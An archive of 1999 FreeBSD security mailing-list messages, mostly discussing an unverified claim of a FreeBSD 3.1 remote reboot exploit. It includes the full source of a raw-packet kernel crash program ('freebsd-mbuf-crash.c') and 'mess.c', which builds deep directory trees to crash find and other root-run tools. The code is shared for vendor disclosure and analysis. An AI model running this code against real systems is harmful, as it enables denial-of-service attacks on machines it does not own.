X-Loop: FreeBSD.org is this one (below) taken care of ? perhaps a derivitice of this ? darren /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. */ #include #include #include #define __FAVOR_BSD #include #include #include #include #include #include u_long htona(char *host) { u_long addr; struct hostent *hp; if ((addr=inet_addr(host)) == INADDR_NONE) { if ((hp = gethostbyname(host)) == NULL) return(-1); bcopy(hp->h_addr_list[0], &addr, sizeof(addr)); } return(addr); } int main(int argc, char* argv[]) { char buf[128]; struct ip *iph = (struct ip *)buf; u_char *ipoptions = (u_char *)(buf + sizeof(struct ip)); struct tcphdr *tcph = (struct tcphdr *)(buf + 60); int s, i; struct sockaddr_in sin; if (argc != 2) { printf("usage\n\t%s \n", argv[0]); exit(1); } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s < 0) { perror("socket"); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(7); sin.sin_addr.s_addr = htona(argv[1]); if (sin.sin_addr.s_addr == -1) { printf("Error resolving %s\n", argv[1]); exit(1); } bzero(buf, sizeof(buf)); iph->ip_hl=15; iph->ip_v=4; iph->ip_len=htons(124); iph->ip_id= htons(getpid()); iph->ip_off= htons(IP_MF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long)); iph->ip_src.s_addr = htona("10.2.3.4"); for (i = 0; i < 20;i++) { ipoptions[i]=0xff; } ipoptions[0] = 0xff; /* Made up option */ ipoptions[1] = 0x1a; memset((char *)&ipoptions[2], 0xff, 37); ipoptions[39] = 1; /* IP_NOP */ tcph->th_sport = htons(5505); tcph->th_dport = htons(23); tcph->th_seq = htonl(0xabcde123); tcph->th_ack = htonl(0x321edcba); tcph->th_flags = TH_ACK | TH_PUSH; tcph->th_win = htons(0x1234); if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { perror("sendto"); exit(1); } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { perror("sendto"); exit(1); } iph->ip_len = htons(80); iph->ip_off = htons(8); if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) { perror("sendto"); exit(1); } exit(0); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 10: 9:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp0.mindspring.com (smtp0.mindspring.com [207.69.200.30]) by hub.freebsd.org (Postfix) with ESMTP id 897D814C0F; Tue, 4 May 1999 10:09:42 -0700 (PDT) (envelope-from honig@sprynet.com) Received: from maryanne (user-38ldg75.dialup.mindspring.com [209.86.192.229]) by smtp0.mindspring.com (8.8.5/8.8.5) with SMTP id NAA29202; Tue, 4 May 1999 13:09:36 -0400 (EDT) Message-Id: <3.0.5.32.19990504100851.007f5820@m7.sprynet.com> X-Sender: honig@m7.sprynet.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Tue, 04 May 1999 10:08:51 -0700 To: (Recipient list suppressed) From: David Honig Subject: BSD & /dev/random web page Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've posted a small collection of my BSD and crypto-randomness-related pages at http://www.geocities.com/SiliconValley/Code/4704/ This includes MUST code in C (and a PDF copy of Maurer's paper), How to instrument BSD with sysctl,How to Verify your IPsec, and studies of /dev/random. The site collects in a permenant place the hacks that I've posted in various fora. I've included a modified BSD random_machdep.c file on the web site which includes sysctl switches for various parts of the /dev/random system. With this, I've observed: By replacing the MD5 hash with an insecure version, (so you can 'see' into the random pool) you can monitor, in real-time, the entropy of your random pool ("cat /dev/urandom | uliscan") and see the effect of various interrupts as they temporarily boost the entropy. This study is in progress. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 11: 0:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from warped.cswnet.com (warped.cswnet.com [209.136.201.6]) by hub.freebsd.org (Postfix) with SMTP id 78CF614F07 for ; Tue, 4 May 1999 11:00:26 -0700 (PDT) (envelope-from lambert@warped.cswnet.com) Received: from gronk.csw.net ( [209.136.201.13] ) by warped.cswnet.com (Hethmon Brothers Smtpd) ; Tue, 4 May 1999 12:01:16 -0600 Message-Id: <199905041201.1622796.6@warped.cswnet.com> From: lambert@warped.cswnet.com Date: Tue, 04 May 1999 13:00:20 -0500 To: freebsd-security@freebsd.org In-Reply-To: <199905032341.2518302.6@warped.cswnet.com> Subject: Re: Disallowing login to all but wheel members? X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.60 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In <199905032341.2518302.6@warped.cswnet.com>, on 05/04/99 at 12:35 AM, lambert@warped.cswnet.com said: >Hi, >I gather that one can supply the correct parameters to login.conf and Never mind. I apparently had a stroke of stupidity. I've got things fixed up in login.access. Thanks, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 11:24:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 6C27E157B3; Tue, 4 May 1999 11:24:39 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA14835; Tue, 4 May 1999 11:24:32 -0700 (PDT) (envelope-from dillon) Date: Tue, 4 May 1999 11:24:32 -0700 (PDT) From: Matthew Dillon Message-Id: <199905041824.LAA14835@apollo.backplane.com> To: "Raymond Wiker" Cc: , Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> <14126.49715.589157.172436@foobar.orion.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Greg Quinlan writes: : > This sounds so.. so very familiar!! : > : > I have been the target of exploits before...... : > : > The exact same thing I have been experiencing........but not for about 5 : > days now! : > : > I'm not convinced its a pure exploit.. (i.e. a program specifically written : > for the purpose) : : My first post to freebsd-stable (and security) - and it's a :me-too :-) : : I'm running 3.1-RELEASE on a 486 with 16 MB of RAM, and this :machine has been falling over regularly. Up until now I have suspected :the local electricity, but it had rebooted this morning, even though :it's now on a UPS. : : I have two other machines running 3.1-RELEASE in a slightly :less hostile environment (i.e, no direct connections outwards), and :they have been much more stable. I cannot rule out a hardware problem :on the 486; I'll know for sure as soon as I upgrade it. : : //Raymond. Setup a serial console and monitor it so you can see the panic message. Or, better, configure the kernel to drop into DDB when it panics so you can do a stack 'trace', and report the results. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:51:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AFADE15DD0 for ; Tue, 4 May 1999 13:51:21 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11178; Tue, 4 May 1999 14:50:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04619; Tue, 4 May 1999 14:50:34 -0600 (MDT) Message-Id: <199905042050.OAA04619@harmony.village.org> To: Brett Glass Subject: Re: Claimed remote reboot exploit: Real or bogus? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 17:11:14 MDT." <4.2.0.37.19990503171021.04dd6630@localhost> References: <4.2.0.37.19990503171021.04dd6630@localhost> Date: Tue, 04 May 1999 14:50:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.37.19990503171021.04dd6630@localhost> Brett Glass writes: : Can anyone confirm or deny the existence of this exploit? I've not seen anything that has come accross my desk that would account for this behavior. There are a few interesting exploit programs that I've seen recently, but I can't get them to kill any of the machines I've tried them on. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:52:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E3DB115DD2 for ; Tue, 4 May 1999 13:51:22 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11180 for ; Tue, 4 May 1999 14:50:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04590; Tue, 4 May 1999 14:49:20 -0600 (MDT) Message-Id: <199905042049.OAA04590@harmony.village.org> To: Gustavo V G C Rios Subject: Re: Security advisories Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 22:10:41 -0300." <372E4911.3A384379@tdnet.com.br> References: <372E4911.3A384379@tdnet.com.br> Date: Tue, 04 May 1999 14:49:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <372E4911.3A384379@tdnet.com.br> Gustavo V G C Rios writes: : Where can i get Security advisories for FreeBSD 2.2.8-Stable ? : http://www.freebsd.org/security/#adv is too old! : The last one is 08/98, FreeBSD is a very secure OS, or nobody knows it's : bugs, what's the truth ? : How can i keep myself up to date with security under FreeBSD ? I don't think there have been any security advisories since then. There have been a number of fixes that might impact security, but none of them have been severe enough to issue an advisory. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:53: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 925B415134 for ; Tue, 4 May 1999 13:53:00 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11190; Tue, 4 May 1999 14:52:16 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04643; Tue, 4 May 1999 14:52:12 -0600 (MDT) Message-Id: <199905042052.OAA04643@harmony.village.org> To: Brett Glass Subject: Re: Claimed remote reboot exploit: Real or bogus? Cc: "David G. Andersen" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 17:29:20 MDT." <4.2.0.37.19990503172000.04f63ee0@localhost> References: <4.2.0.37.19990503172000.04f63ee0@localhost> <4.2.0.37.19990503171021.04dd6630@localhost> Date: Tue, 04 May 1999 14:52:12 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.37.19990503172000.04f63ee0@localhost> Brett Glass writes: : Still, the release of 3.2-R is nigh, and we DO want to install that : one. So, we'd like to see the exploit identified and squashed before : 3.2-R goes out the door. I'm real keen on that as well. If anybody gets a copy of an exploit, please forward it to the security officer with explicit instructions on how to run it. I've had a few exploits come accross recently that have said they were bad, but weren't trivial to run. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:54:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E18FD14F78; Tue, 4 May 1999 13:54:26 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11194; Tue, 4 May 1999 14:53:42 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04656; Tue, 4 May 1999 14:53:34 -0600 (MDT) Message-Id: <199905042053.OAA04656@harmony.village.org> To: Vince Vielhaber Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Cc: Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 19:40:59 EDT." References: Date: Tue, 04 May 1999 14:53:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Vince Vielhaber writes: : It's typically in bad taste to post it to BugTraq before contacting the : vendor. I can say that no one appears to have contacted security-officer about this. People have contacted us in the past saying that their machine randomly reboots. When pressed for details, or to enable ddb or crash dumps to see why the machine is rebooting, they disappear and nothing further is heard from them. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14: 4:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 94FC215DD3 for ; Tue, 4 May 1999 14:04:07 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA11246; Tue, 4 May 1999 15:03:24 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA04810; Tue, 4 May 1999 15:03:20 -0600 (MDT) Message-Id: <199905042103.PAA04810@harmony.village.org> To: Darren Reed Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 05 May 1999 01:26:38 +1000." <199905041526.BAA29421@cheops.anu.edu.au> References: <199905041526.BAA29421@cheops.anu.edu.au> Date: Tue, 04 May 1999 15:03:20 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes: : is this one (below) taken care of ? perhaps a derivitice of this ? What's it supposed to do? I can't get it to cause any grief on my -current system, nor on the 3.1-stable based systems we have here at work. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:10:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.usinternet.com (smtp.usinternet.com [216.17.3.30]) by hub.freebsd.org (Postfix) with ESMTP id 3781215C1E; Tue, 4 May 1999 14:09:50 -0700 (PDT) (envelope-from mike@negativezero.com) Received: from lobster ([216.17.11.49]) by smtp.usinternet.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with SMTP id com; Tue, 4 May 1999 16:09:49 -0500 X-Sender: nz-postmaster@mail.negativezero.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0 Date: Tue, 04 May 1999 16:13:12 -0500 To: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG From: Mike Uttech Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <199905042053.OAA04656@harmony.village.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Message-Id: <19990504210951.3781215C1E@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We used to have problems with one of our 3.1-RELEASE boxes randomly locking up with no logs of why. We decided to split the load off of the one machine and have not had a problem with it locking up since. If my memory serves me today, I remember reading about a problem in the 3.1-RELEASE distribution that under heavy load caused the system to hang or reboot. I personally feel that many of these people (the ones who are saying they have been having random reboots) are not being attacked in anyway but rather are having their machines overloaded and rebooting. Mike At 03:53 PM 5/4/99 , Warner Losh wrote: >In message Vince Vielhaber writes: >: It's typically in bad taste to post it to BugTraq before contacting the >: vendor. > >I can say that no one appears to have contacted security-officer about >this. People have contacted us in the past saying that their machine >randomly reboots. When pressed for details, or to enable ddb or crash >dumps to see why the machine is rebooting, they disappear and nothing >further is heard from them. > >Warner > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:12: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 545BB14F9C for ; Tue, 4 May 1999 14:11:56 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id RAA23519; Tue, 4 May 1999 17:11:39 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma023290; Tue, 4 May 99 17:11:04 -0400 Date: Tue, 04 May 1999 17:10:55 -0400 (EDT) From: Seth Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: <199905042053.OAA04656@harmony.village.org> To: Warner Losh Cc: Vince Vielhaber , security@FreeBSD.ORG Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In my defense (and to reiterate): 1) I saw this hit bugtraq and, having seen nothing on any lists about it, assumed (correctly, as it turns out) that the customary "vendor" notifications had not been sent. I therefore sent it to -stable and to security@freebsd.org. 2) I am not the one claiming the alleged vulnerability. I'm the one reporting that it was claimed. (It seems I need to make this clear due to the numerous emails from cranky BSD citizens criticizing me for posting to bugtraq before notifying security@. Once again: **I didn't post this to bugtraq!** I merely saw it there and passed it along. I have NO IDEA whether this is a real vulnerability, but I thought it was something the security folks should know about as soon as possible, either to try to reproduce [unlikely given the lack of details] or to prepare a response.) Sorry if it seems like I'm doing damage control. I am, in a way. I'm just tired of the senseless flames I'm getting accusing me of heinous crimes against the freebsd community -- crimes for which I have, and will accept, no responsibility. SB On Tue, 4 May 1999, Warner Losh wrote: > In message Vince Vielhaber writes: > : It's typically in bad taste to post it to BugTraq before contacting the > : vendor. > > I can say that no one appears to have contacted security-officer about > this. People have contacted us in the past saying that their machine > randomly reboots. When pressed for details, or to enable ddb or crash > dumps to see why the machine is rebooting, they disappear and nothing > further is heard from them. > > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:14:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2C03D14D17 for ; Tue, 4 May 1999 14:14:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA11299; Tue, 4 May 1999 15:13:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA04984; Tue, 4 May 1999 15:13:29 -0600 (MDT) Message-Id: <199905042113.PAA04984@harmony.village.org> To: Seth Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Cc: Vince Vielhaber , security@FreeBSD.ORG In-reply-to: Your message of "Tue, 04 May 1999 17:10:55 EDT." References: Date: Tue, 04 May 1999 15:13:29 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Seth writes: : 1) I saw this hit bugtraq and, having seen nothing on any lists about : it, assumed (correctly, as it turns out) that the customary "vendor" : notifications had not been sent. I therefore sent it to -stable and to : security@freebsd.org. I know that you just forwarded it. I was just letting people know that the secure channels didn't see this either. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:22:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 92F2614C8E for ; Tue, 4 May 1999 14:22:48 -0700 (PDT) (envelope-from des@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA07687 for ; Tue, 4 May 1999 23:22:47 +0200 (MET DST) Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:22:46 +0200 (MET DST) To: security@freebsd.org Subject: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit From: Dag-Erling Smorgrav Date: 04 May 1999 23:22:44 +0200 Message-ID: Lines: 35 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- Start of forwarded message ------- Message-ID: <19990501031840.A24252@dilbert.exodus.net> Date: Sat, 1 May 1999 03:18:40 -0500 Reply-To: jamie@exodus.net From: Jamie Rishaw Subject: FreeBSD 3.1 remote reboot exploit To: BUGTRAQ@NETSPACE.ORG Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's ------- End of forwarded message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:29:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 9225114DE7 for ; Tue, 4 May 1999 14:29:22 -0700 (PDT) (envelope-from des@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA08417 for ; Tue, 4 May 1999 23:29:21 +0200 (MET DST) Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:29:20 +0200 (MET DST) To: security@freebsd.org Subject: [Przemyslaw Frasunek ] Re: Buffer overflow in ftpd and locate bug From: Dag-Erling Smorgrav Date: 04 May 1999 23:29:17 +0200 Message-ID: Lines: 92 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- Start of forwarded message ------- Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org> Date: Sun, 2 May 1999 20:37:35 CEST Reply-To: Przemyslaw Frasunek From: Przemyslaw Frasunek Subject: Re: Buffer overflow in ftpd and locate bug To: BUGTRAQ@NETSPACE.ORG --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body > I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1 > It segfaults if we have huge directory at incoming ftp which created > by exploits for ftpd realpath hole. My ftpd is patched. Those exploits > ,i think, should not afraid me, but if updatedb puts to locate database > that directory then locate segfaults. ( getline.c 104 row by gdb ) > I guess it can be used for running arbitrary commands if root runs locate. I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating _very_ long and deep directory structure it's possible to segfault /usr/bin/find (it's also used in /etc/periodic scripts, which runs on root). Example: I'm creating a directory structure with 300 subdirectories, each 255 chars length (source in attachment, also it's possible to do it via ftpd, because it calls mkdir() and chdir()). lagoon:venglin:/tmp/jc> find example > /dev/null Segmentation fault (core dumped) Gdb shows, that functions puts() was overflowed, when it tried to print a very long path. Also other system tools (rm, ls) has big problems with such directory structures. -- * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 * * Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF * --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-disposition: inline Content-description: Attachment information. The following section of this message contains a file attachment prepared for transmission using the Internet MIME message format. If you are using Pegasus Mail, or any another MIME-compliant system, you should be able to save it or view it from within your mailer. If you cannot, please ask your system administrator for assistance. ---- File information ----------- File: mess.c Date: 2 May 1999, 19:01 Size: 748 bytes. Type: Text --Message-Boundary-25450 Content-type: Application/Octet-stream; name=mess.c; type=Text Content-disposition: attachment; filename="mess.c" #include #include #include #include #define DUMP 0x41 main(int argc, char *argv[]) { char buf[255]; int i = 0; if (argc < 3) { fprintf(stderr, "usage: %s \n", argv[0]); exit(1); } if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); } memset(buf, DUMP, 255); for(i=0;i<(atoi(argv[2]))-1;i++) { if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } } exit(0); } --Message-Boundary-25450-- ------- End of forwarded message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15: 9:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id AB14C15231; Tue, 4 May 1999 15:09:10 -0700 (PDT) (envelope-from tim@iafrica.com.na) Received: from dup15-whk.iafrica.com.na ([196.20.4.15] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10enN5-000Aij-00; Wed, 5 May 1999 00:09:00 +0200 Message-ID: <372F7025.7081@iafrica.com.na> Date: Wed, 05 May 1999 00:09:41 +0200 From: Tim Priebe Reply-To: tim@iafrica.com.na X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: Greg Quinlan Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I saw such behavior Sunday when trying to implement a new firewall. The system would repeatedly panic with a trap 12. This would happen immediatelly after the login prompt appeared after the previous panic. The system would be stable, if I removed the first ethernet cable, plug the cable back in, and a short while later it would start over again. It was late, and we had to get the system working again, so we restored to the previous system. I have some information logged for packets at the time. I will check this and try to reproduce after I finish the course I am on this week. Tim. Greg Quinlan wrote: > > This sounds so.. so very familiar!! > > I have been the target of exploits before...... > > The exact same thing I have been experiencing........but not for about 5 > days now! > > I'm not convinced its a pure exploit.. (i.e. a program specifically written > for the purpose) > > Greg > > -----Original Message----- > From: Karl Denninger > To: chris@calldei.com ; Jordan K. Hubbard > > Cc: Mike Smith ; Seth ; > freebsd-stable@FreeBSD.ORG ; > security@FreeBSD.ORG ; jamie@exodus.net > > Date: 04 May 1999 05:20 > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) > > >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > >> On Mon, May 3, 1999, Jordan K. Hubbard wrote: > >> > > I have to say that Jamie really let us down by not running a raw > >> > > tcpdump alongside the second targetted machine here. Any chance of > >> > > provoking these people into "demonstrating" the exploit on a machine, > >> > > while another connected to the same wire is running > >> > > >> > I'd say he or whomever first reported this to bugtraq let us down even > >> > more by releasing an "advisory" in such an unknown and unverifyable > >> > state. By doing so, all they've done is hand ammunition to the FUD > >> > corps and given us no reasonable chance to respond since the advisory > >> > >> I get the impression that that was the whole point of the > >> bugtraq post, to give us more grief. > > > >Ding! > > > >Give that man a cigar. > > > >Anyone who saw this done to one machine and didn't *immediately* configure > >machine #2 to trap and trace on the second instance deserves raspberries - > >at a minimum. > > > >Its one thing to have it done "anyonmously" (among other things you might > >not be there when it goes "boom" under those conditions!) Its another to > >have it done under controlled conditions and neither get an explanantion > >OR trap the condition that caused it yourself with a tcpdump trace. > > > >-- > >-- > >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > >I ain't even *authorized* to speak for anyone other than myself, so give > >up now on trying to associate my words with any particular organization. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15:13:53 1999 Delivered-To: 